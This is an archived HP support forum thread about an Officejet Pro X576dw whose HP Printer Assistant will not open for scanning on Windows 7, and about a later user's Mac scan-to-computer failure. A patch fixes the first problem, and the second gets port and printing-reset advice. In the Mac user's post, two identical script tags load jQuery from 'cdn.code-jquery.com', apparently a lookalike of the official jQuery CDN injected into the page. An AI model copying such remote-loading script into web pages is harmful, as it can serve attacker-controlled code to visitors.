Information
    Windows update impacting certain printer icons and names. Microsoft is working on a solution.
    Click here to learn more
    Information
    Need Windows 11 help?
    Check documents on compatibility, FAQs, upgrade information and available fixes.
    Windows 11 Support Center.
  • post a message
    Information
    Windows update impacting certain printer icons and names. Microsoft is working on a solution.
    Click here to learn more
    Information
    Need Windows 11 help?
    Check documents on compatibility, FAQs, upgrade information and available fixes.
    Windows 11 Support Center.
  • post a message
Guidelines
The HP Community is where owners of HP products, like you, volunteer to help each other find solutions.
Archived This topic has been archived. Information and links in this thread may no longer be available or relevant. If you have a question create a new topic by clicking here and select the appropriate board.
HP Recommended

Friends,

We recently bought and installed an HP Office Jet Pro x576 dw.  After initial setup, it seemed to work fine.  Shortly afterwards, however, the scanning to computer feature has failed.  Here is what I have tried so far:

• I uninstalled and reinstalled, and it still doesn't work.
 I'm running Windows 7, 32-bit.  I realized that nothing happened when I clicked on HP Officejet Pro X576dw MFP icon, so I looked and observed under Processes in the Windows Task Manager that the S/W starts up for a few seconds, but it exits before any window pops up.  

• I uninstalled ALL of the HP software, and I downloaded and installed "HP Officejet Pro X576dw MFP Full Software Solution" from the HP website.  The actual file name was: OJX576_DW_973.exe, and the version number reported in the control panel (in the uninstall menu) is 29.1.973.39397

The install seemed to work fine, but the Printer Assistant software still won't run.

• After that exercise, I uninstalled all the HP software again, rebooted, ran windows update, rebooted, and reinstalled the latest Full Software Solution from the HP website.  The install seems to go fine -- the last menu I see is the one where I enter my zip code, etc.   Afterwards, nothing happens when I click on HP Officejet Pro X576dw MFP in the Start menu or doubleclick on the shortcut that the installation placed on the desktop.   The MFP won't let me scan to computer (because it says it hasn't been set up), but I can still print to it.

We connect to the printer wirelessly.  

Note that I'm pretty sure this worked a couple of days ago, and I haven't knowingly installed any software since we originally installed the printer about a week ago, nor does any show up in the uninstall menu.

After trying the various steps above, I searched this forum and tried this solution (quoted here from another thread):

• Follow the steps below to check the WIA Service:

1. Type services.msc in run or search program and files
2. Scroll down to the WIA Windows Image Acquisition
3. Make sure that this service is running. Click Stop, and then Restart to make sure
4. Restart the computer

Restart the Dependencies services:
1. Click on Start, in Search box type “services” without quotes.
2. Scroll down until you see Windows Image Acquisition (WIA).
3. Double click on it and go to the tab called Dependencies.
4. 2 services should be listed.
5. Exit that window and look for Remote Procedure Call (RPC).
6. Make sure it’s on manual or if it is on Auto, just leave it. Make sure the service is started though.
7. Go to Shell Hardware Detection and Double click.
8. Set the Start up Type as Manual and hit Apply.
9. You should be able to Start the service by hitting Start.
10. Now you are done and the Twain Manager should be working and not give you an error. This should fix your problem

I'm super frustrated at this point and hope that someone out there has a solution. I really need the scan to printer feature to work to take advantage of this awesome machine!

Thanks so much,

Rita

Edit: When I tried to post this, it said invalid HTML was found in the message body and removed.

1 ACCEPTED SOLUTION

Accepted Solutions
HP Recommended

I will do my best to assist you with getting HP Printer Assistant to open again.  You can also post this same information on the HP Enterprise Business Support Forums to get more exposure since this is one of the few Enterprise Officejets.  I would like to add there is a firmware update available for this printer that may be of assistance.

Here is a document that discusses more about problems with HP Printer Assistance.  

--HP Printer Assistant Opens with a Script Error or in Notepad--

There is a place in this document to download a patch for your computer.  Hopefully this will help you get HP Printer Assistant to open.  Even though the title is a little different than your actual problem I have had this work before in this instance.

Let me know if you get any specific error messages.  If you can print and even scan using Windows Fax and Scan or Paint, then that will confirm for me that the software installed, the printer is functioning properly, and that the only problem you have is with this one program.

I'm happy to help!

Don't forgot to say thanks by giving "Kudos" if I helped solve your problem.

When a solution is found please mark the post that solves your issue.

Every problem has a solution!

View solution in original post

11 REPLIES 11
HP Recommended

I will do my best to assist you with getting HP Printer Assistant to open again.  You can also post this same information on the HP Enterprise Business Support Forums to get more exposure since this is one of the few Enterprise Officejets.  I would like to add there is a firmware update available for this printer that may be of assistance.

Here is a document that discusses more about problems with HP Printer Assistance.  

--HP Printer Assistant Opens with a Script Error or in Notepad--

There is a place in this document to download a patch for your computer.  Hopefully this will help you get HP Printer Assistant to open.  Even though the title is a little different than your actual problem I have had this work before in this instance.

Let me know if you get any specific error messages.  If you can print and even scan using Windows Fax and Scan or Paint, then that will confirm for me that the software installed, the printer is functioning properly, and that the only problem you have is with this one program.

I'm happy to help!

HP Recommended

Thank you VisionAiry!

Although the title was a little different than my actual problem, the patch seems to work.

By the way,  I had confirmed that I could print using any software. I could scan using Windows Fax and Scan. The HP Print and Scan Doctor was happy. It could scan and it would print a test page.

However, still the HP printer software would never appear on my machine.  I could see the process start up in the Windows Task Manager, but the window never popped up. 

The patch seems to have fixed the problem.

HP Recommended

I am so glad you came back to let me know which solution fixed it for you.  This is, by far, one of my favorite printers ever and I am honored to have been able to help you with it.  Let me know if I can be of any more assistance. 😄

Happy Scanning!!

HP Recommended

My problem is with a mac Os 10.6.  It works with my macbook air but not on my mac desktop.  I spen hours yesterday with tech support and we did everything he could think of but scanner is still not recognized by my mac.  any solutions?

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
HP Recommended

How is the printer connected (USB, wireless, or Ethernet)?  Did you try resetting the printing system?  See my link on how to do that.  It will remove all of your printers from your Mac but it may help out.  Honestly, it sounds like an issue with the scanning port in the router - that is if the printer is on the wireless network.  Let me know if resetting the printing system doesn't help by replying on how the printer is connected and I will give you more steps then.  

Always happy to help!

HP Recommended

Hi

Thanks for your support.  I tried resetting as you suggested .  It did not work.  I have tried using ethernet, usb, and wi fi and none work.

I have enabled sharing, set up a folder for scan sharing, reinstalled software etc.

I can print and copy just fine.  But when I go to scan the printer/scanner says "no computer can be found".

Any other ideas?

Hp tech support spent hrs with me doing all sorts of things but still no fix.

HP Recommended

I must admit, I am not the most proficient in Mac but this sounds more like a port (scanner ports - upd 427, tcp 9220, 9500).  Other times it can be your anti-virus software keeping the two from communicating.  

When you set the printer up on a network and are able to obtain an IP address for the printer, can you type in the printer's IP address into a web browser and access it's webpage?  I believe this printer has a web scan feature you can use in the meantime by accessing this page.

--Officejet Pro X Series - Solve Software Problems with Macs--  Hopefully this link will lead you in the right direction.  Let me know if not.  If not, you may want to create an entirely new forum post so that you have more access to more of the MAC experts today.  Some may not be able to see this since it is burried into an older thread.

Good luck!  Keep me posted.

HP Recommended

Hi,

I am able to scan from the web page and also to network.  I still cannot scan fro scanner to computer.  I have tried all of the things suggested in these posts.  Anything else come to mind?

HP Recommended

If you can start a scan from your computer just not from the front of the printer, then check HP Product Assistant under the scan option for "Enable Scan to Computer."  At least I believe that would be the fix.  This is the only HP printer ever I have never had a chance to work on yet I wrote the book on it. Ironic, I know.

Let me know if that doesn't work by telling me what the error message says and I will be happy to help.

Archived This topic has been archived. Information and links in this thread may no longer be available or relevant. If you have a question create a new topic by clicking here and select the appropriate board.
† The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the <a href="https://www8.hp.com/us/en/terms-of-use.html" class="udrlinesmall">Terms of Use</a> and <a href="/t5/custom/page/page-id/hp.rulespage" class="udrlinesmall"> Rules of Participation</a>.